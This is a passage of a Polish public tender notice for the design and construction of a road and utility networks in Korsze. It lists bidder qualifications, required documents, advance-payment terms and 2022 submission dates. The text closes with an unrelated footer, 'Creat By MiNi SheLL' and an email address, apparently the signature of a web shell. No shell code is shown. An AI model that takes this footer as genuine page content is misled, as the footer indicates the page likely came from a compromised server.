3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 świadczenia polegające na projektowaniu budowy lub przebudowy dróg, ulic o wartości co najmniej 70.000,00 zł brutto każde świadczenie.<br/>b) na potrzeby realizacji zamówienia dysponuje lub będzie dysponował wskazanymi poniżej osobami, które zostaną skierowane do realizacji zamówienia:<br/>- osobę pełniącą funkcję projektanta, która łącznie spełnia poniższe wymagania: posiada uprawnienia budowlane do projektowania w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2021 r., poz. 2351 ze zm.) lub<br/>odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów w specjalności inżynieryjnej drogowej bez ograniczeń (we wszystkich branżach), posiada doświadczenie polegające na opracowaniu dokumentacji projektowej inwestycji obejmującej budowę, rozbudowę, przebudowę lub remont drogi; posiada doświadczenia polegające na opracowaniu dokumentacji projektowej inwestycji obejmującej budowę sieci uzbrojenia terenu; posiada doświadczenie polegające na pełnieniu nadzoru autorskiego nad opracowaną dokumentacją projektową w ramach minimum<br/>dwóch inwestycji;<br/>- osobę pełniącą funkcję kierownika budowy, która łącznie spełnia poniższe wymagania: posiada uprawnienia budowlane do kierowania robotami budowlanymi w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2021 r., poz.<br/>2351 ze zm.) lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów w specjalności inżynieryjnej drogowej bez ograniczeń; posiada doświadczenie polegające na pełnieniu funkcji kierownika budowy lub kierownika robót w ramach minimum dwóch zadań obejmujących budowę, rozbudowę, przebudowę lub remont<br/>drogi.<br/>- osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi, do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności inżynieryjnej: drogowej bez ograniczeń oraz instalacyjnej w zakresie sieci, instalacji i urządzeń: telekomunikacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz elektrycznych, których zakres uprawnia do kierowania robotami objętymi przedmiotem zamówienia (posiada uprawnienia budowlane do kierowania<br/>robotami budowlanymi w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2021 r., poz. 2351 ze zm.) lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów w specjalności inżynieryjnej drogowej bez ograniczeń); posiada doświadczenie polegające na pełnieniu funkcji kierownika budowy lub kierownika robót w ramach minimum dwóch zadań obejmujących budowę, rozbudowę, przebudowę lub remont drogi. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 8 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - załącznik nr 6 do SWZ;<br/>2) Wykaz usług projektowych wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty - załącznik nr 10 do SWZ;<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – wg wzoru załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca może złożyć tylko jedną ofertę. Treść oferty musi odpowiadać treści SWZ.<br/>2. Ofertę składa się na Formularzu Ofertowym – zgodnie z załącznikiem nr 1 do SWZ.<br/>3. Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ (zał. 2 do SWZ);<br/>2) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy) ;<br/>3) zobowiązanie innego podmiotu, o którym mowa w Rozdziale VII ust. 7 SWZ (zał. nr 7 do SWZ propozycja zobowiązania);<br/>4) wykaz podwykonawców, o którym mowa w Rozdziale V ust. 3 SWZ (zał. nr 5 do SWZ);<br/>5) dokumenty, z których wynika prawo do podpisania oferty. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, chyba, że Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, a Wykonawca w formularzu oferty wskazał dane (tj. nr KRS, nr NIP lub REGON) umożliwiające dostęp do tych dokumentów, w odniesieniu<br/>do Wykonawcy jak również do podmiotów udostępniających zasoby.;<br/>6) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, o którym mowa w Rozdziale X (załącznik nr 3 do SWZ oświadczenie). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy – załącznik 3 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zadanie jest przedmiotem dofinansowania ze środków Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych, dlatego wypłata wynagrodzenia nastąpi w dwóch częściach:<br/>- pierwsza część ze środków własnych Zamawiającego w formie zaliczki w wysokości 5% wynagrodzenia umownego i po złożeniu do Zamawiającego wniosku przez Wykonawcę o wypłatę zaliczki,<br/>- druga część w wysokości kwoty wynagrodzenia umownego pomniejszonej o kwotę zaliczki wypłaconej w pierwszej części, po dokonaniu odbioru końcowego zadania.<br/>Wniosek o zaliczkę Wykonawca może złożyć po przekazaniu mu placu budowy załączając do wniosku fakturę zaliczkową z terminem płatności nie krótszym niż 14 dni. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego<br/>na warunkach określonych we wzorze Umowy, stanowiącym załącznik nr 4 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we wzorze Umowy, stanowiącym załącznik nr 4 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zamówieniowa https://korsze.logintrade.net/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-30 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com